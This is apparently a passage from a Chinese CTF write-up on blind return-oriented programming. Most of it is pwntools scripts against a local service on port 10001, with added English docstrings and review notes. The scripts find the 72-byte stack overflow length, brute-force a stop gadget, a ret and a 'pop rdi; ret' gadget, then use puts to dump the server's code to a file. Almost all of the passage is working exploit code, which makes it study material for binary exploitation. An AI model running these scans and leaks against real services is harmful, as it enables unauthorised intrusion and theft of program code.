from pwn import*
def getsize():
    """Find the overflow length by growing the input one byte at a time.

    Each iteration opens a fresh connection to 127.0.0.1:10001, waits for the
    banner, sends ``probe_len`` bytes of 'a' and reads a single reply.  The
    loop keeps going while the reply starts with 'No password'; the first
    length that produces a different reply, or that makes the service close
    the connection (EOFError), ends the search.

    Returns:
        int: the last length that was still answered with 'No password'
        (one less than the length that changed the reply or dropped the
        connection).

    NOTE(review): the only signals used are the reply prefix and EOF, so
    from the service side this phase is a run of short connections with
    steadily growing input, each ending in a reply or a dropped socket.
    NOTE(review): the EOFError handler assumes the failure came from
    recvuntil/recv, i.e. after ``conn`` was bound in this iteration --
    confirm that ``remote()`` itself cannot raise EOFError here.
    """
    probe_len = 1
    while True:
        try:
            conn = remote('127.0.0.1', 10001)
            conn.recvuntil("WelCome my friend,Do you know password?\n")
            conn.send('a' * probe_len)
            reply = conn.recv()
            conn.close()
            if reply.startswith('No password'):
                # Still the ordinary rejection: nothing changed yet, grow
                # the input by one byte and try again.
                probe_len += 1
                continue
            return probe_len - 1
        except EOFError:
            conn.close()
            return probe_len - 1
# Run the probe once and report the length it settled on.
size = getsize()
print("size is : %s " % size)
可以得知栈溢出长度为72。
第二步(获取stop_gadget):
from pwn import *
def get_stop():
    """Scan upward from 0x400000 for an address whose reply brings the banner back.

    For each candidate ``addr`` a new connection is opened, the banner is
    consumed, and 72 bytes of padding followed by ``p64(addr)`` are sent.
    The reply decides what happens next:

    * it starts with 'WelCome'  -> the address is printed, ``pause()`` is
      called and ``addr`` is returned;
    * anything else             -> printed as 'one success addr' and the
      scan moves on;
    * EOFError                  -> reported with ``log.info`` and the scan
      moves on;
    * any other exception       -> reported as "can't connect" and the same
      address is retried (``addr`` is decremented before the next
      ``addr += 1``).

    Returns:
        int: the first address whose reply begins with 'WelCome'.  There is
        no upper bound, so the loop never returns if no such address exists.

    NOTE(review): indentation was lost in the paste; ``addr -= 1`` is read
    as the last statement of the bare ``except`` -- confirm against the
    original.  The bare ``except`` also swallows KeyboardInterrupt raised
    inside the ``try`` body, so Ctrl-C may only take effect during
    ``sleep``.
    NOTE(review): the scan assumes the code address is identical on every
    connection (it starts from a fixed 0x400000 base); per-connection
    address randomisation would leave this loop with nothing stable to find.
    """
    addr = 0x400000
    while True:
        sleep(0.1)  # throttle: one probe every 100 ms
        addr += 1
        try:
            print(hex(addr))
            conn = remote('127.0.0.1', 10001)
            conn.recvuntil("WelCome my friend,Do you know password?\n")
            conn.sendline('a' * 72 + p64(addr))
            reply = conn.recv()
            conn.close()
            if not reply.startswith('WelCome'):
                print('one success addr : 0x%x' % (addr))
                continue
            print("main funciton-->[%s]" % hex(addr))
            pause()
            return addr
        except EOFError:
            conn.close()
            log.info("bad :0x%x" % addr)
        except:
            log.info("can't connect")
            addr -= 1
# Run the scan and print the address it stopped on.
data = get_stop()
print(hex(data))
from pwn import *
# Address at which the get_stop() scan saw the banner come back; ret_addr()
# places it as the final return address in its payload.
stop_gadget = 0x401070
def ret_addr(addr):
    """Probe whether returning into ``addr`` and then ``stop_gadget`` keeps the service talking.

    Opens a connection to 127.0.0.1:10001, waits for the banner, sends 72
    bytes of padding followed by ``p64(addr)`` and ``p64(stop_gadget)``,
    and reads from the socket.  When the read after the first line is not
    ``None`` the address is reported via ``io.info`` and a
    '[*] the ret addr' line; when the service closes the connection instead,
    the address is reported via ``log.info``.  Nothing is returned; the
    outcome is only printed/logged.

    Args:
        addr: candidate return address placed before ``stop_gadget``.

    NOTE(review): indentation was lost in the paste; ``io.close()`` is read
    as the last statement of the ``try`` body (run whether or not the ``if``
    fires) -- confirm against the original.  ``io.recv()`` is also called
    twice: the value compared with ``None`` is discarded and the printed
    value is whatever the second call reads.
    """
    io = remote("127.0.0.1", 10001)
    chain = 'A' * 72 + p64(addr) + p64(stop_gadget)
    io.recvuntil("WelCome my friend,Do you know password?")
    io.sendline(chain)
    try:
        io.recvline()
        got_reply = io.recv() is not None
        if got_reply:
            print(io.recv())
            io.info("find gadgets at 0x%x" % addr)
            print("[*] the ret addr at 0x%x" % (addr))
        io.close()
    except EOFError:
        io.close()
        log.info("the connection is close at 0x%x" % addr)
# Probe 0x1001 consecutive addresses starting at 0x400001.  The for-loop
# replaces the manual counter; ``count`` ends at 0x1001 and ``start`` at
# 0x401001, exactly as the while/break form leaves them.
start = 0x400000
for count in range(1, 0x1002):
    start += 1
    ret_addr(start)
有了ret(0x401000),我们就可以寻找 pop rdi;ret了:
from pwn import *
# Address of the plain return found by the ret_addr() scan (the prose above
# names 0x401000); get_useful_gadget() appends it after each candidate.
ret = 0x401000
# Same stop address as in the previous step: the final return that brings
# the banner back.
stop_gadget = 0x401070
def get_useful_gadget(addr):
    """Send three chained payloads around ``addr`` and report it if the banner survives all three.

    A single connection to 127.0.0.1:10001 is used.  After the banner, the
    payloads go out one at a time, each only if the previous one was again
    followed by the banner:

    * first:  72 bytes of padding, ``addr - 1``, a zero qword, ``ret``,
      ``stop_gadget``;
    * second: the same layout with ``addr``;
    * third:  72 bytes of padding, ``addr + 1``, ``ret``, ``stop_gadget``
      (no zero qword).

    If the banner is seen after the third payload the address is reported
    via ``io.info`` and handed to ``log_in_file`` (not defined on this
    page).  An EOFError at any point is logged with ``log.info``.  Nothing
    is returned.

    Args:
        addr: candidate gadget address.

    NOTE(review): indentation was lost in the paste; ``io.close()`` is read
    as the last statement of the ``try`` body -- confirm against the
    original.
    """
    io = remote("127.0.0.1", 10001)
    banner = "WelCome my friend,Do you know password?"
    padding = 'A' * 72
    tail = p64(ret) + p64(stop_gadget)
    first = padding + p64(addr - 1) + p64(0) + tail
    second = padding + p64(addr) + p64(0) + tail
    third = padding + p64(addr + 1) + tail
    io.recvuntil(banner)
    try:
        io.sendline(first)
        if io.recvuntil(banner):
            io.sendline(second)
            if io.recvuntil(banner):
                io.sendline(third)
                if io.recvuntil(banner):
                    io.info("find gdgets at 0x%x" % addr)
                    log_in_file(addr)
        io.close()
    except EOFError:
        io.close()
        log.info("the connection is close at 0x%x" % addr)
# Probe every address upward from 0x400001.  There is no stop condition or
# upper bound, so this loop runs until the process is killed.
start = 0x400000
while True:
    start += 1
    get_useful_gadget(start)
from pwn import*
def leak(length, rdi_ret, puts_plt, leak_addr, stop_gadget):
    """Ask the service to print the bytes at ``leak_addr`` and return what came back.

    Opens a connection to 127.0.0.1:10001, waits for the prompt, and sends
    ``length`` bytes of padding followed by ``rdi_ret``, ``leak_addr``,
    ``puts_plt`` and ``stop_gadget`` as qwords.  The reply is read with a
    0.1 s timeout and cut at the first newline followed by 'WelCome' (the
    banner re-appearing); if that leaves nothing, a single NUL byte is
    returned in place of the empty string.

    Args:
        length: padding length before the first qword.
        rdi_ret, leak_addr, puts_plt, stop_gadget: qwords placed in the
            payload in that order.

    Returns:
        str: the bytes read back (at least one byte), or ``None`` when the
        receive failed (any exception from ``recv``/``close``).
    """
    conn = remote('127.0.0.1', 10001)
    chain = (
        'a' * length
        + p64(rdi_ret)
        + p64(leak_addr)
        + p64(puts_plt)
        + p64(stop_gadget)
    )
    conn.recvuntil('password?\n')
    conn.sendline(chain)
    try:
        reply = conn.recv(timeout=0.1)
        conn.close()
    except Exception:
        conn.close()
        return None
    # Drop everything from the re-printed banner onward; if the marker is
    # absent (or reply is not a str) keep the reply as is.
    try:
        reply = reply[:reply.index("\nWelCome")]
    except Exception:
        pass
    if reply == "":
        reply = '\x00'
    return reply
# Constants carried over from the earlier steps.  brop_gadget is assigned
# but not referenced below.
length = 72
stop_gadget = 0x401070
brop_gadget = 0x401076
rdi_ret = 0x401076
puts_plt = 0x400560

# Walk 0x400000..0x400fff: a successful leak advances by the number of bytes
# received, a failed one (None) by a single byte.  That is at most 0x1000
# separate connections to port 10001 in quick succession.
addr = 0x400000
result = ''
while addr < 0x401000:
    print(hex(addr))
    data = leak(length, rdi_ret, puts_plt, addr, stop_gadget)
    if data is not None:
        result += data
        addr += len(data)
    else:
        addr += 1

# Write the concatenated bytes to ./code1 for offline inspection.
with open('code1', 'wb') as f:
    f.write(result)